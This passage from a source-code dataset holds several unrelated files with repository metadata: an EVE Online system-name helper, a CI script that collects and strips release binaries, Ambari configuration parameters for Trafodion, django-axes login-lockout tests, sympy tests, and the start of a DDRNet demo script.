] | 43 | 2021-06-30T22:27:15.000Z | 2022-03-16T23:14:28.000Z | src/eyeson/translators.py | sapporojones/eyeson | 129c3bda4c0bdf562aab4d8072a20c667ff9b4b3 | [
"MIT"
] | null | null | null | import argparse
import calendar
import datetime
import time
import requests
import json
from rich.console import Console
from rich.table import Table
def timestamper(timestamp):
"""
Converts timestamps from json to NhNmNs output in a formatted string
:param timestamp: formatted like "2021-06-04T01:25:26Z"
:return: formatted f string containing time data
"""
# timestamp = "2021-06-04T01:25:26Z"
td = timestamp.split("T", 1)
tdd = f"{td[0]} {td[1]}"
tss = tdd.split("Z", 1)
iso_stamp = tss[0]
now = time.gmtime()
nowsecs = calendar.timegm(now)
nowstamp = datetime.datetime.utcfromtimestamp(nowsecs)
killtime = datetime.datetime.fromisoformat(iso_stamp)
tdelta = nowstamp - killtime
tsdelta = str(tdelta)
tssdelta = tsdelta.split(":", 2)
deltastring = f"{tssdelta[0]}h {tssdelta[1]}m {tssdelta[2]}s ago"
return deltastring
def name2id(sys_name):
"""
Converts a Solar System name to Solar System ID
:param sys_name: String value name of the system such as "Jita" or "D-PNP9"
:return: system_id: the ID value of the provided system name.
"""
search_url = (
f"https://esi.evetech.net/latest/search/?categories=solar_system&datasource=tranquility&language=en"
f"&search={sys_name} "
)
search_object = requests.get(search_url)
search_json = search_object.json()
system_id = search_json["solar_system"][0]
return system_id
def id2name(sys_id):
"""
Helper function to convert system IDs to name for verification purposes
:param sys_id: the integer value ID of the system to be checked
:return: system_name: the string name of the system
"""
search_url = f"https://esi.evetech.net/latest/universe/systems/{sys_id}/"
search_object = requests.get(search_url)
search_json = search_object.json()
system_name = search_json["name"]
return system_name
| 29.6 | 108 | 0.691788 |
b764fbaf4278631741084a2f89b346ec441fd498 | 4,706 | py | Python | gitlab-ci/src/artifacts/collector.py | ninegua/ic | fb3fe3ff87ce413a79f267ece80ae78f0f8b00fd | [
"Apache-2.0"
] | 1 | 2021-11-19T18:45:44.000Z | 2021-11-19T18:45:44.000Z | gitlab-ci/src/artifacts/collector.py | ninegua/ic | fb3fe3ff87ce413a79f267ece80ae78f0f8b00fd | [
"Apache-2.0"
] | null | null | null | gitlab-ci/src/artifacts/collector.py | ninegua/ic | fb3fe3ff87ce413a79f267ece80ae78f0f8b00fd | [
"Apache-2.0"
] | null | null | null | import logging
import multiprocessing
import os
import shutil
import tempfile
from os import path
from typing import List
from ci import cwd
from ci import ENV
from ci import log_section
from ci import mkdir_p
from ci import sh
def local(v: str) -> str:
return path.join(ENV.top, "gitlab-ci/src/artifacts", v)
RUST_BINARIES = [
"boundary-node-control-plane",
"boundary-node-prober",
"canister_sandbox",
"e2e-test-driver",
"ic-admin",
"ic-btc-adapter",
"ic-canister-http-adapter",
"ic-consensus-pool-util",
"ic-crypto-csp",
"ic-cup-explorer",
"ic-get-neuron-ids",
"ic-nns-init",
"ic-p8s-service-discovery",
"ic-p8s-sd",
"ic-prep",
"ic-recovery",
"ic-regedit",
"ic-replay",
"ic-rosetta-api",
"ic-starter",
"ic-test-bin",
"ic-workload-generator",
"orchestrator",
"prod-test-driver",
"replica",
"sandbox_launcher",
"state-tool",
"system-tests",
"vsock_agent",
]
DONT_STRIP = ["replica", "canister_sandbox"]
STRIP_REFS = {
"x86_64-unknown-linux-gnu": [
"*-glibc-*",
"*-gcc-*",
"*-openssl-*",
"*-libidn2-*",
"*-binutils-*",
"*-crates-io",
],
"x86_64-apple-darwin": ["*-crates-io", "*-swift-corefoundation", "*-openssl-*"],
}
class Collector:
"""A script that collects a list of binaries, performs various transformations on them (see below), and puts them in `ARTIFACTS_DIR` so GitLab can detect and upload them."""
artifacts_dir: str
files: List[str]
def __init__(
self,
artifacts_dir="artifacts/nix-release",
files=RUST_BINARIES,
) -> None:
self.artifacts_dir = artifacts_dir
self.files = files
self.temp = tempfile.mkdtemp()
@classmethod
def collect(cls, artifacts_dir="artifacts/nix-release", files=RUST_BINARIES):
with log_section("Click here to see artifact processing output"):
cls(artifacts_dir, files).run()
def run(self):
with cwd(ENV.top):
# This is the directory GitLab searches for artifacts once the job has completed
self.out_dir = path.join(ENV.top, self.artifacts_dir)
mkdir_p(self.out_dir)
p = multiprocessing.Pool()
try:
p.map(self._process_one, self.files)
except KeyboardInterrupt:
p.terminate()
p.join()
raise
if "malicious" in self.artifacts_dir:
return
if path.exists("/openssl/private.pem"):
sh(local("openssl-sign.sh"), self.out_dir)
else:
logging.warn("/openssl/private.pem doesn't exist, so these artifacts won't be signed")
def _process_one(self, binary: str):
"""
Things we do in here:.
* Strip debuginfo from the binaries (using objcopy or strip)
* On Linux, run patchelf, so binaries built in nix-shell can run on other systems
* On Darwin, fix dylibs, which accomplishes the same goal as the previous bullet point
* If REALLY_STRIP is set, strip Nix store references and fail if there are any we don't recognize (disabled right now because the nix shell path ends up in every rpath for some reason)
"""
src_path = path.join(ENV.target_dir, ENV.build_target, "release", binary)
bin_path = path.join(self.temp, binary)
if not os.access(src_path, os.R_OK):
logging.info(f"Binary not found at {src_path}")
return
shutil.copyfile(src_path, bin_path)
if binary not in DONT_STRIP:
self._strip(bin_path)
self._adjust_paths(bin_path)
self._strip_refs(bin_path)
sh("pigz", "-c", "--no-name", bin_path, pipe_to=path.join(self.out_dir, f"{binary}.gz"))
def _strip(self, in_path: str):
if ENV.is_linux:
sh("objcopy", "-D", "--strip-debug", "-R", ".comment", "-R", ".note.gnu.build-id", in_path)
elif ENV.is_macos:
sh("strip", "-S", in_path)
def _adjust_paths(self, in_path: str):
if ENV.is_linux:
sh(
"patchelf",
"--remove-rpath",
"--set-interpreter",
"/lib64/ld-linux-x86-64.so.2",
in_path,
)
else:
sh(local("relocate-darwin-syslibs.sh"), in_path)
def _strip_refs(self, in_path: str):
if "REALLY_STRIP" in os.environ:
sh(
local("strip-references.sh"),
in_path,
env={"allowedStrippedRefs": " ".join(STRIP_REFS[ENV.build_target])},
)
| 29.229814 | 192 | 0.584573 |
65187487fcc85c0e9032767e449d623afafd0d1a | 4,646 | py | Python | install/ambari-installer/traf-mpack/common-services/TRAFODION/2.1/package/scripts/params.py | anoopsharma00/incubator-trafodion | b109e2cf5883f8e763af853ab6fad7ce7110d9e8 | [
"Apache-2.0"
] | null | null | null | install/ambari-installer/traf-mpack/common-services/TRAFODION/2.1/package/scripts/params.py | anoopsharma00/incubator-trafodion | b109e2cf5883f8e763af853ab6fad7ce7110d9e8 | [
"Apache-2.0"
] | null | null | null | install/ambari-installer/traf-mpack/common-services/TRAFODION/2.1/package/scripts/params.py | anoopsharma00/incubator-trafodion | b109e2cf5883f8e763af853ab6fad7ce7110d9e8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# @@@ START COPYRIGHT @@@
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# @@@ END COPYRIGHT @@@
from resource_management import *
# config object that holds the configurations declared in the config xml file
config = Script.get_config()
java_home = config['hostLevelParams']['java_home']
java_version = int(config['hostLevelParams']['java_version'])
cluster_name = str(config['clusterName'])
dcs_servers = config['configurations']['dcs-env']['dcs.servers']
dcs_master_port = config['configurations']['dcs-site']['dcs.master.port']
dcs_info_port = config['configurations']['dcs-site']['dcs.master.info.port']
dcs_floating_ip = config['configurations']['dcs-site']['dcs.master.floating.ip.external.ip.address']
dcs_mast_node_list = default("/clusterHostInfo/traf_dcs_prime_hosts", '')
dcs_back_node_list = default("/clusterHostInfo/traf_dcs_second_hosts", '')
dcs_env_template = config['configurations']['dcs-env']['content']
dcs_log4j_template = config['configurations']['dcs-log4j']['content']
zookeeper_quorum_hosts = ",".join(config['clusterHostInfo']['zookeeper_hosts'])
if 'zoo.cfg' in config['configurations'] and 'clientPort' in config['configurations']['zoo.cfg']:
zookeeper_clientPort = config['configurations']['zoo.cfg']['clientPort']
else:
zookeeper_clientPort = '2181'
traf_db_admin = config['configurations']['trafodion-env']['traf.db.admin']
traf_conf_dir = '/etc/trafodion/conf' # path is hard-coded in /etc/trafodion/trafodion_config
traf_env_template = config['configurations']['trafodion-env']['content']
traf_clust_template = config['configurations']['traf-cluster-env']['content']
traf_user = 'trafodion'
traf_group = 'trafodion'
hdfs_user = config['configurations']['hadoop-env']['hdfs_user']
hbase_user = config['configurations']['hbase-env']['hbase_user']
hbase_staging = config['configurations']['hbase-site']['hbase.bulkload.staging.dir']
traf_priv_key = config['configurations']['trafodion-env']['traf.sshkey.priv']
traf_node_list = default("/clusterHostInfo/traf_node_hosts", '')
traf_scratch = config['configurations']['trafodion-env']['traf.node.dir']
traf_ldap_template = config['configurations']['trafodion-env']['ldap_content']
traf_ldap_enabled = config['configurations']['trafodion-env']['traf.ldap.enabled']
ldap_hosts = ''
for host in config['configurations']['trafodion-env']['traf.ldap.hosts'].split(','):
ldap_hosts += ' LDAPHostName: %s\n' % host
ldap_port = config['configurations']['trafodion-env']['traf.ldap.port']
ldap_identifiers = ''
for identifier in config['configurations']['trafodion-env']['traf.ldap.identifiers'].split(';'):
ldap_identifiers += ' UniqueIdentifier: %s\n' % identifier
ldap_user = config['configurations']['trafodion-env']['traf.ldap.user']
ldap_pwd = config['configurations']['trafodion-env']['traf.ldap.pwd']
ldap_encrypt = config['configurations']['trafodion-env']['traf.ldap.encrypt']
ldap_certpath = config['configurations']['trafodion-env']['traf.ldap.certpath']
#HDFS Dir creation
hostname = config["hostname"]
hadoop_conf_dir = "/etc/hadoop/conf"
hdfs_user_keytab = config['configurations']['hadoop-env']['hdfs_user_keytab']
security_enabled = config['configurations']['cluster-env']['security_enabled']
kinit_path_local = functions.get_kinit_path(default('/configurations/kerberos-env/executable_search_paths', None))
hdfs_site = config['configurations']['hdfs-site']
default_fs = config['configurations']['core-site']['fs.defaultFS']
import functools
#create partial functions with common arguments for every HdfsDirectory call
#to create hdfs directory we need to call params.HdfsDirectory in code
HdfsDirectory = functools.partial(
HdfsResource,
type="directory",
hadoop_conf_dir=hadoop_conf_dir,
user=hdfs_user,
hdfs_site=hdfs_site,
default_fs=default_fs,
security_enabled = security_enabled,
keytab = hdfs_user_keytab,
kinit_path_local = kinit_path_local
)
| 45.54902 | 114 | 0.759793 |
5ae36b07fe2ff64762983b3ebf9523d62de9d6a2 | 21,076 | py | Python | tests/test_handlers.py | p1-gdd/django-axes | 813a8518bc7306988492fdafdf38c0cd887f1129 | [
"MIT"
] | null | null | null | tests/test_handlers.py | p1-gdd/django-axes | 813a8518bc7306988492fdafdf38c0cd887f1129 | [
"MIT"
] | 3 | 2022-03-15T12:29:15.000Z | 2022-03-25T12:29:41.000Z | tests/test_handlers.py | p1-gdd/django-axes | 813a8518bc7306988492fdafdf38c0cd887f1129 | [
"MIT"
] | null | null | null | from platform import python_implementation
from unittest.mock import MagicMock, patch
from pytest import mark
from django.core.cache import cache
from django.test import override_settings
from django.urls import reverse
from django.utils import timezone
from django.utils.timezone import timedelta
from axes.conf import settings
from axes.handlers.proxy import AxesProxyHandler
from axes.helpers import get_client_str
from axes.models import AccessAttempt, AccessLog, AccessFailureLog
from tests.base import AxesTestCase
@override_settings(AXES_HANDLER="axes.handlers.base.AxesHandler")
class AxesHandlerTestCase(AxesTestCase):
@override_settings(AXES_IP_BLACKLIST=["127.0.0.1"])
def test_is_allowed_with_blacklisted_ip_address(self):
self.assertFalse(AxesProxyHandler.is_allowed(self.request))
@override_settings(
AXES_NEVER_LOCKOUT_WHITELIST=True, AXES_IP_WHITELIST=["127.0.0.1"]
)
def test_is_allowed_with_whitelisted_ip_address(self):
self.assertTrue(AxesProxyHandler.is_allowed(self.request))
@override_settings(AXES_NEVER_LOCKOUT_GET=True)
def test_is_allowed_with_whitelisted_method(self):
self.request.method = "GET"
self.assertTrue(AxesProxyHandler.is_allowed(self.request))
@override_settings(AXES_LOCK_OUT_AT_FAILURE=False)
def test_is_allowed_no_lock_out(self):
self.assertTrue(AxesProxyHandler.is_allowed(self.request))
@override_settings(AXES_ONLY_ADMIN_SITE=True)
def test_only_admin_site(self):
request = MagicMock()
request.path = "/test/"
self.assertTrue(AxesProxyHandler.is_allowed(self.request))
def test_is_admin_site(self):
request = MagicMock()
tests = ( # (AXES_ONLY_ADMIN_SITE, URL, Expected)
(True, "/test/", True),
(True, reverse("admin:index"), False),
(False, "/test/", False),
(False, reverse("admin:index"), False),
)
for setting_value, url, expected in tests:
with override_settings(AXES_ONLY_ADMIN_SITE=setting_value):
request.path = url
self.assertEqual(AxesProxyHandler().is_admin_site(request), expected)
@override_settings(ROOT_URLCONF="tests.urls_empty")
@override_settings(AXES_ONLY_ADMIN_SITE=True)
def test_is_admin_site_no_admin_site(self):
request = MagicMock()
request.path = "/admin/"
self.assertTrue(AxesProxyHandler().is_admin_site(self.request))
class AxesProxyHandlerTestCase(AxesTestCase):
def setUp(self):
self.sender = MagicMock()
self.credentials = MagicMock()
self.request = MagicMock()
self.user = MagicMock()
self.instance = MagicMock()
@patch("axes.handlers.proxy.AxesProxyHandler.implementation", None)
def test_setting_changed_signal_triggers_handler_reimport(self):
self.assertIsNone(AxesProxyHandler.implementation)
with self.settings(AXES_HANDLER="axes.handlers.database.AxesDatabaseHandler"):
self.assertIsNotNone(AxesProxyHandler.implementation)
@patch("axes.handlers.proxy.AxesProxyHandler.implementation")
def test_user_login_failed(self, handler):
self.assertFalse(handler.user_login_failed.called)
AxesProxyHandler.user_login_failed(self.sender, self.credentials, self.request)
self.assertTrue(handler.user_login_failed.called)
@patch("axes.handlers.proxy.AxesProxyHandler.implementation")
def test_user_logged_in(self, handler):
self.assertFalse(handler.user_logged_in.called)
AxesProxyHandler.user_logged_in(self.sender, self.request, self.user)
self.assertTrue(handler.user_logged_in.called)
@patch("axes.handlers.proxy.AxesProxyHandler.implementation")
def test_user_logged_out(self, handler):
self.assertFalse(handler.user_logged_out.called)
AxesProxyHandler.user_logged_out(self.sender, self.request, self.user)
self.assertTrue(handler.user_logged_out.called)
@patch("axes.handlers.proxy.AxesProxyHandler.implementation")
def test_post_save_access_attempt(self, handler):
self.assertFalse(handler.post_save_access_attempt.called)
AxesProxyHandler.post_save_access_attempt(self.instance)
self.assertTrue(handler.post_save_access_attempt.called)
@patch("axes.handlers.proxy.AxesProxyHandler.implementation")
def test_post_delete_access_attempt(self, handler):
self.assertFalse(handler.post_delete_access_attempt.called)
AxesProxyHandler.post_delete_access_attempt(self.instance)
self.assertTrue(handler.post_delete_access_attempt.called)
class AxesHandlerBaseTestCase(AxesTestCase):
def check_whitelist(self, log):
with override_settings(
AXES_NEVER_LOCKOUT_WHITELIST=True, AXES_IP_WHITELIST=[self.ip_address]
):
AxesProxyHandler.user_login_failed(
sender=None, request=self.request, credentials=self.credentials
)
client_str = get_client_str(
self.username,
self.ip_address,
self.user_agent,
self.path_info,
self.request,
)
log.info.assert_called_with(
"AXES: Login failed from whitelisted client %s.", client_str
)
def check_empty_request(self, log, handler):
AxesProxyHandler.user_login_failed(sender=None, credentials={}, request=None)
log.error.assert_called_with(
f"AXES: {handler}.user_login_failed does not function without a request."
)
@override_settings(AXES_HANDLER="axes.handlers.database.AxesDatabaseHandler")
class ResetAttemptsTestCase(AxesHandlerBaseTestCase):
"""Resetting attempts is currently implemented only for database handler"""
USERNAME_1 = "foo_username"
USERNAME_2 = "bar_username"
IP_1 = "127.1.0.1"
IP_2 = "127.1.0.2"
def setUp(self):
super().setUp()
self.create_attempt()
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_2)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_2)
def test_handler_reset_attempts(self):
self.assertEqual(5, AxesProxyHandler.reset_attempts())
self.assertFalse(AccessAttempt.objects.count())
def test_handler_reset_attempts_username(self):
self.assertEqual(2, AxesProxyHandler.reset_attempts(username=self.USERNAME_1))
self.assertEqual(AccessAttempt.objects.count(), 3)
self.assertEqual(
AccessAttempt.objects.filter(ip_address=self.USERNAME_1).count(), 0
)
def test_handler_reset_attempts_ip(self):
self.assertEqual(2, AxesProxyHandler.reset_attempts(ip_address=self.IP_1))
self.assertEqual(AccessAttempt.objects.count(), 3)
self.assertEqual(AccessAttempt.objects.filter(ip_address=self.IP_1).count(), 0)
def test_handler_reset_attempts_ip_and_username(self):
self.assertEqual(
1,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_1, username=self.USERNAME_1
),
)
self.assertEqual(AccessAttempt.objects.count(), 4)
self.assertEqual(AccessAttempt.objects.filter(ip_address=self.IP_1).count(), 1)
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_1)
self.assertEqual(
1,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_1, username=self.USERNAME_2
),
)
self.assertEqual(
1,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_2, username=self.USERNAME_1
),
)
def test_handler_reset_attempts_ip_or_username(self):
self.assertEqual(
3,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_1, username=self.USERNAME_1, ip_or_username=True
),
)
self.assertEqual(AccessAttempt.objects.count(), 2)
self.assertEqual(AccessAttempt.objects.filter(ip_address=self.IP_1).count(), 0)
self.assertEqual(
AccessAttempt.objects.filter(ip_address=self.USERNAME_1).count(), 0
)
@override_settings(
AXES_HANDLER="axes.handlers.database.AxesDatabaseHandler",
AXES_COOLOFF_TIME=timedelta(seconds=2),
AXES_RESET_ON_SUCCESS=True,
AXES_ENABLE_ACCESS_FAILURE_LOG=True,
)
@mark.xfail(
python_implementation() == "PyPy",
reason="PyPy implementation is flaky for this test",
strict=False,
)
class AxesDatabaseHandlerTestCase(AxesHandlerBaseTestCase):
def test_handler_reset_attempts(self):
self.create_attempt()
self.assertEqual(1, AxesProxyHandler.reset_attempts())
self.assertFalse(AccessAttempt.objects.count())
def test_handler_reset_logs(self):
self.create_log()
self.assertEqual(1, AxesProxyHandler.reset_logs())
self.assertFalse(AccessLog.objects.count())
def test_handler_reset_logs_older_than_42_days(self):
self.create_log()
then = timezone.now() - timezone.timedelta(days=90)
with patch("django.utils.timezone.now", return_value=then):
self.create_log()
self.assertEqual(AccessLog.objects.count(), 2)
self.assertEqual(1, AxesProxyHandler.reset_logs(age_days=42))
self.assertEqual(AccessLog.objects.count(), 1)
def test_handler_reset_failure_logs(self):
self.create_failure_log()
self.assertEqual(1, AxesProxyHandler.reset_failure_logs())
self.assertFalse(AccessFailureLog.objects.count())
def test_handler_reset_failure_logs_older_than_42_days(self):
self.create_failure_log()
then = timezone.now() - timezone.timedelta(days=90)
with patch("django.utils.timezone.now", return_value=then):
self.create_failure_log()
self.assertEqual(AccessFailureLog.objects.count(), 2)
self.assertEqual(1, AxesProxyHandler.reset_failure_logs(age_days=42))
self.assertEqual(AccessFailureLog.objects.count(), 1)
def test_handler_remove_out_of_limit_failure_logs(self):
_more = 10
for i in range(settings.AXES_ACCESS_FAILURE_LOG_PER_USER_LIMIT + _more):
self.create_failure_log()
self.assertEqual(_more, AxesProxyHandler.remove_out_of_limit_failure_logs(username=self.username))
@override_settings(AXES_RESET_ON_SUCCESS=True)
def test_handler(self):
self.check_handler()
@override_settings(AXES_RESET_ON_SUCCESS=False)
def test_handler_without_reset(self):
self.check_handler()
@override_settings(AXES_FAILURE_LIMIT=lambda *args: 3)
def test_handler_callable_failure_limit(self):
self.check_handler()
@override_settings(AXES_FAILURE_LIMIT="tests.base.custom_failure_limit")
def test_handler_str_failure_limit(self):
self.check_handler()
@override_settings(AXES_FAILURE_LIMIT=None)
def test_handler_invalid_failure_limit(self):
with self.assertRaises(TypeError):
self.check_handler()
@override_settings(AXES_LOCK_OUT_AT_FAILURE=False)
def test_handler_without_lockout(self):
self.check_handler()
@patch("axes.handlers.database.log")
def test_empty_request(self, log):
self.check_empty_request(log, "AxesDatabaseHandler")
@patch("axes.handlers.database.log")
def test_whitelist(self, log):
self.check_whitelist(log)
@override_settings(AXES_ONLY_USER_FAILURES=True)
@patch("axes.handlers.database.log")
def test_user_login_failed_only_user_failures_with_none_username(self, log):
credentials = {"username": None, "password": "test"}
sender = MagicMock()
AxesProxyHandler.user_login_failed(sender, credentials, self.request)
attempt = AccessAttempt.objects.all()
self.assertEqual(0, AccessAttempt.objects.count())
log.warning.assert_called_with(
"AXES: Username is None and AXES_ONLY_USER_FAILURES is enabled, new record will NOT be created."
)
def test_user_login_failed_with_none_username(self):
credentials = {"username": None, "password": "test"}
sender = MagicMock()
AxesProxyHandler.user_login_failed(sender, credentials, self.request)
attempt = AccessAttempt.objects.all()
self.assertEqual(1, AccessAttempt.objects.filter(username__isnull=True).count())
def test_user_login_failed_multiple_username(self):
configurations = (
(2, 1, {}, ["admin", "admin1"]),
(2, 1, {"AXES_USE_USER_AGENT": True}, ["admin", "admin1"]),
(2, 1, {"AXES_ONLY_USER_FAILURES": True}, ["admin", "admin1"]),
(
2,
1,
{"AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP": True},
["admin", "admin1"],
),
(
1,
2,
{"AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP": True},
["admin", "admin"],
),
(1, 2, {"AXES_LOCK_OUT_BY_USER_OR_IP": True}, ["admin", "admin"]),
(2, 1, {"AXES_LOCK_OUT_BY_USER_OR_IP": True}, ["admin", "admin1"]),
)
for (
total_attempts_count,
failures_since_start,
overrides,
usernames,
) in configurations:
with self.settings(**overrides):
with self.subTest(
total_attempts_count=total_attempts_count,
failures_since_start=failures_since_start,
settings=overrides,
):
self.login(username=usernames[0])
attempt = AccessAttempt.objects.get(username=usernames[0])
self.assertEqual(1, attempt.failures_since_start)
# check the number of failures associated to the attempt
self.login(username=usernames[1])
attempt = AccessAttempt.objects.get(username=usernames[1])
self.assertEqual(failures_since_start, attempt.failures_since_start)
# check the number of distinct attempts
self.assertEqual(
total_attempts_count, AccessAttempt.objects.count()
)
AccessAttempt.objects.all().delete()
@override_settings(AXES_HANDLER="axes.handlers.cache.AxesCacheHandler")
class ResetAttemptsCacheHandlerTestCase(AxesHandlerBaseTestCase):
"""Test reset attempts for the cache handler"""
USERNAME_1 = "foo_username"
USERNAME_2 = "bar_username"
IP_1 = "127.1.0.1"
IP_2 = "127.1.0.2"
def set_up_login_attempts(self):
"""Set up the login attempts."""
self.login(username=self.USERNAME_1, remote_addr=self.IP_1)
self.login(username=self.USERNAME_1, remote_addr=self.IP_2)
self.login(username=self.USERNAME_2, remote_addr=self.IP_1)
self.login(username=self.USERNAME_2, remote_addr=self.IP_2)
def check_failures(self, failures, username=None, ip_address=None):
if ip_address is None and username is None:
raise NotImplementedError("Must supply ip_address or username")
try:
prev_ip = self.request.META["REMOTE_ADDR"]
credentials = {"username": username} if username else {}
if ip_address is not None:
self.request.META["REMOTE_ADDR"] = ip_address
self.assertEqual(
failures,
AxesProxyHandler.get_failures(self.request, credentials=credentials),
)
finally:
self.request.META["REMOTE_ADDR"] = prev_ip
def test_handler_reset_attempts(self):
with self.assertRaises(NotImplementedError):
AxesProxyHandler.reset_attempts()
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_handler_reset_attempts_username(self):
self.set_up_login_attempts()
self.assertEqual(
2,
AxesProxyHandler.get_failures(
self.request, credentials={"username": self.USERNAME_1}
),
)
self.assertEqual(
2,
AxesProxyHandler.get_failures(
self.request, credentials={"username": self.USERNAME_2}
),
)
self.assertEqual(1, AxesProxyHandler.reset_attempts(username=self.USERNAME_1))
self.assertEqual(
0,
AxesProxyHandler.get_failures(
self.request, credentials={"username": self.USERNAME_1}
),
)
self.assertEqual(
2,
AxesProxyHandler.get_failures(
self.request, credentials={"username": self.USERNAME_2}
),
)
def test_handler_reset_attempts_ip(self):
self.set_up_login_attempts()
self.check_failures(2, ip_address=self.IP_1)
self.assertEqual(1, AxesProxyHandler.reset_attempts(ip_address=self.IP_1))
self.check_failures(0, ip_address=self.IP_1)
self.check_failures(2, ip_address=self.IP_2)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_handler_reset_attempts_ip_and_username(self):
self.set_up_login_attempts()
self.check_failures(1, username=self.USERNAME_1, ip_address=self.IP_1)
self.check_failures(1, username=self.USERNAME_2, ip_address=self.IP_1)
self.check_failures(1, username=self.USERNAME_1, ip_address=self.IP_2)
self.assertEqual(
1,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_1, username=self.USERNAME_1
),
)
self.check_failures(0, username=self.USERNAME_1, ip_address=self.IP_1)
self.check_failures(1, username=self.USERNAME_2, ip_address=self.IP_1)
self.check_failures(1, username=self.USERNAME_1, ip_address=self.IP_2)
def test_handler_reset_attempts_ip_or_username(self):
with self.assertRaises(NotImplementedError):
AxesProxyHandler.reset_attempts()
@override_settings(
AXES_HANDLER="axes.handlers.cache.AxesCacheHandler",
AXES_COOLOFF_TIME=timedelta(seconds=1),
)
class AxesCacheHandlerTestCase(AxesHandlerBaseTestCase):
@override_settings(AXES_RESET_ON_SUCCESS=True)
def test_handler(self):
self.check_handler()
@override_settings(AXES_RESET_ON_SUCCESS=False)
def test_handler_without_reset(self):
self.check_handler()
@override_settings(AXES_LOCK_OUT_AT_FAILURE=False)
def test_handler_without_lockout(self):
self.check_handler()
@patch("axes.handlers.cache.log")
def test_empty_request(self, log):
self.check_empty_request(log, "AxesCacheHandler")
@patch("axes.handlers.cache.log")
def test_whitelist(self, log):
self.check_whitelist(log)
@override_settings(AXES_ONLY_USER_FAILURES=True)
@patch.object(cache, "set")
@patch("axes.handlers.cache.log")
def test_user_login_failed_only_user_failures_with_none_username(
self, log, cache_set
):
credentials = {"username": None, "password": "test"}
sender = MagicMock()
AxesProxyHandler.user_login_failed(sender, credentials, self.request)
self.assertFalse(cache_set.called)
log.warning.assert_called_with(
"AXES: Username is None and AXES_ONLY_USER_FAILURES is enabled, new record will NOT be created."
)
@patch.object(cache, "set")
def test_user_login_failed_with_none_username(self, cache_set):
credentials = {"username": None, "password": "test"}
sender = MagicMock()
AxesProxyHandler.user_login_failed(sender, credentials, self.request)
self.assertTrue(cache_set.called)
@override_settings(AXES_HANDLER="axes.handlers.dummy.AxesDummyHandler")
class AxesDummyHandlerTestCase(AxesHandlerBaseTestCase):
def test_handler(self):
for _ in range(settings.AXES_FAILURE_LIMIT):
self.login()
self.check_login()
def test_handler_is_allowed(self):
self.assertEqual(True, AxesProxyHandler.is_allowed(self.request, {}))
def test_handler_get_failures(self):
self.assertEqual(0, AxesProxyHandler.get_failures(self.request, {}))
@override_settings(AXES_HANDLER="axes.handlers.test.AxesTestHandler")
class AxesTestHandlerTestCase(AxesHandlerBaseTestCase):
def test_handler_reset_attempts(self):
self.assertEqual(0, AxesProxyHandler.reset_attempts())
def test_handler_reset_logs(self):
self.assertEqual(0, AxesProxyHandler.reset_logs())
def test_handler_is_allowed(self):
self.assertEqual(True, AxesProxyHandler.is_allowed(self.request, {}))
def test_handler_get_failures(self):
self.assertEqual(0, AxesProxyHandler.get_failures(self.request, {}))
| 39.394393 | 108 | 0.683479 |
2cc992f4dc4434d16972c388781f01b472cb8ace | 603 | py | Python | sympy/core/tests/test_compatibility.py | cap11235/sympy | 6f68fa186dc9e80cdafddb1e4d72f49684286cda | [
"BSD-3-Clause"
] | 26 | 2018-02-14T23:52:58.000Z | 2021-08-16T13:50:03.000Z | sympy/core/tests/test_compatibility.py | shashank-agg/sympy | ecf69893c0b9927ea7192113b2421d639aee6ffb | [
"BSD-3-Clause"
] | null | null | null | sympy/core/tests/test_compatibility.py | shashank-agg/sympy | ecf69893c0b9927ea7192113b2421d639aee6ffb | [
"BSD-3-Clause"
] | 10 | 2018-08-13T19:38:39.000Z | 2020-04-19T03:02:00.000Z | from sympy.core.compatibility import default_sort_key, as_int, ordered
from sympy.core.singleton import S
from sympy.utilities.pytest import raises
from sympy.abc import x
def test_default_sort_key():
func = lambda x: x
assert sorted([func, x, func], key=default_sort_key) == [func, func, x]
def test_as_int():
raises(ValueError, lambda : as_int(1.1))
raises(ValueError, lambda : as_int([]))
def test_ordered():
# Issue 4111 - this had been failing with python2/3 problems
assert(list(ordered([{1:3, 2:4, 9:10}, {1:3}])) == \
[{1: 3}, {1: 3, 2: 4, 9: 10}])
| 27.409091 | 75 | 0.661692 |
daf1046912bc8b489d93bba1aca4b5e4ff2bc450 | 5,376 | py | Python | tools/demo_detect.py | bkhti4/DDRNet.pytorch | d3c56f45ce36d9f16fedaa44c68dcd4e627f04ad | [
"MIT"
] | null | null | null | tools/demo_detect.py | bkhti4/DDRNet.pytorch | d3c56f45ce36d9f16fedaa44c68dcd4e627f04ad | [
"MIT"
] | null | null | null | tools/demo_detect.py | bkhti4/DDRNet.pytorch | d3c56f45ce36d9f16fedaa44c68dcd4e627f04ad | [
"MIT"
] | null | null | null | import argparse
import os
import pprint
import shutil
import sys
import cv2
import logging
import time
import timeit
from pathlib import Path
import numpy as np
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.nn import functional as F
import _init_paths
import models
from config import config
import datasets
from datasets.base_dataset import BaseDataset
#from lib.config import config
from config import update_config
#from core.function import testval, test
from utils.modelsummary import get_model_summary
from utils.utils import create_logger, FullModel, speed_test, Map16
def parse_args():
parser = argparse.ArgumentParser(description='Train segmentation network')
parser.add_argument('--cfg',
help='experiment configure file name',
default="experiments/cityscapes/ddrnet23_slim.yaml",
type=str)
